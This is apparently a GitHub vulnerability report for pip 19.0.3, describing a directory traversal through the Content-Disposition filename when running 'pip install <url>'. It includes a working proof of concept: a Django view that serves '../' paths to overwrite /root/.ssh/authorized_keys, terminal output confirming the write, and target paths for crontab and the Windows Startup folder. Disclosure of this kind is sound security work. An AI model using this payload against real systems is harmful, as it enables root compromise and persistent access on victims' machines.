pip install <url> allow directory traversal, leading to arbitrary file write #6413
Description
Environment
- pip version: pip 19.0.3
- Python version: Python 2.7.15 / Python 2.7.15
- OS: Ubuntu 16.04 / Windows 10
Description
This is a security vulnerability.
when installing a remote package via a specified URL "pip install <url>", A malicious server (or a network MitM if downloading over HTTP) can send a Content-Disposition header with filename which contains "../", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution.
issue occurs in _download_http_url in src/pip/_internal/download.py
poc:
for linux, pip usually requires root privileges, we can write following files to get root shell:
/root/.ssh/authorized_keys
/etc/crontab
for windows, we can write a batch file to the user startup dir, lead to command execution on next boot:
C:\Users<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
for malicious header:
from django.http import HttpResponse
def linux(request):
response = HttpResponse("malicious public key\n")
filename = "../../../../../root/.ssh/authorized_keys"
response['Content-Type'] = 'RANDOM' # avoid mimetypes.guess_extension guess ext
response['Content-Disposition'] = 'attachment;filename="{0}"'.format(filename)
return response
pip install malicious url result:
root@DESKTOP-FRESH:~# pip install http://192.168.40.16/linux
Looking in indexes: https://mirrors.aliyun.com/pypi/simple/
Collecting http://192.168.40.16/linux
Downloading http://192.168.40.16/linux
Cannot unpack file /root/.ssh/authorized_keys (downloaded from /tmp/pip-req-build-UAVkjW, content-type: RANDOM); cannot detect archive format
Cannot determine archive format of /tmp/pip-req-build-UAVkjW
root@DESKTOP-FRESH:~# cat /root/.ssh/authorized_keys
malicious public key
root@DESKTOP-FRESH:~#
similar issue: